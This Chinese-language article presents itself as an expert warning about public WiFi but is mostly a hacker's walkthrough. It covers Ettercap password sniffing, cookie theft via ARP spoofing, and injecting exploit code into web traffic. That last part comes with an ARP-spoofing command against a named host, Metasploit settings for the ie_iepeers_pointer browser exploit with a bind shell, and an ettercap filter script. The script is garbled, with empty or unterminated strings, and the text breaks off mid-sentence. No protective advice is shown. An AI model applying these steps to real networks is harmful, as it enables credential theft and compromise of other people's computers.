專家:小心使用公共場所WiFi
隨著智能手機和各類終端(如iPAD)的普及,越來越多的用戶喜歡使用它們進行網上沖浪、網上購物、手機網銀操作等。這些設備都提供了WiFi接入的功能,目前在很多公共場所都提供了免費的Wifi的熱點,所以很多用戶都會使用這些免費的WiFi進行上網操作。隨著WiFi的普及,打WiFi主意的黑客也逐漸多了起來。下面我就分析一下他們的做法:
一、密碼嗅探
1、使用Ettercap嗅探工具
2、選擇用于嗅探數據包的網絡接口
3、探測局域網內的主機列表
4、添加嗅探目標,并開始執(zhí)行嗅探
5、這時如果源和目標主機進行了數據通信,且涉及到了疑是用戶名密碼等數據,捕獲的信息將會顯示
6、即使使用SSL的也同樣可以被嗅探到
7、其它可以嗅探的口令信息:TELNET、FTP、POP、RLOGIN、SSH1、ICQ、SMB、MySQL、HTTP、NNTP、 X11、NAPSTER、IRC、RIP、BGP、SOCK5、IMAP4、VNC、LDAP、NFS、SNMP、HALFLIFE、QUAKE3、 MSNYMSG。
二、盜取cookie
同樣使用Ettercap,然后使用arp欺騙實現:
三、arp掛馬
利用ARP 欺騙把數據流都引到本地,然后替換成我們事先準備好的掛馬代碼,再轉發(fā)出去。
ettercap -T -q -F ieexpft -M arp:remote /192.168.1.105/ // 表示對192.168.1.105主機進行arp欺騙 啟動Msf的使用
use exploit/windows/browser/ie_iepeers_pointer
set SRVHOST 192.168.1.103(攻擊者ip) Msf會自動為我們開啟類似服務 其他默認就可下面指定payload使用這個set PAYLOAD window/shell/bind_tcp Payload的選項保持默認就行默認綁定4444端口 目標:0 Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0
下面看一下ettercap的過濾腳本馬上開始 ettercap使用的過濾腳本 If(ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data,"Accept-Encoding")) {
replace("Accept-Encoding","Accept-Mousecat");
msg("zapped Accept-Encoding!\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
if (search(DATA.data, "") ){
replace("","
msg("Filter Run...&&Exploit Code Injected OK!\n");
}
}
過濾腳本的功能 第一個if語句塊,功能是如果ip協議匹配TCP,并且目標端口是80的話(一般是說瀏覽器瀏覽網頁時候,對網站80端口發(fā)送請求),則搜索HTTP 數據流的Accept-ncoding,并且替換為Accept-Mousecat,然后在控制臺打印一條“zappedAccept-Encoding”的消息,目的是為了避免目標客戶端瀏覽器像啟用了GZIP 這樣的數據壓縮功能。 第二個if 語句塊,如果ip 協議匹配TCP,并且源端口是80的話,則搜索
關鍵字,并且替換為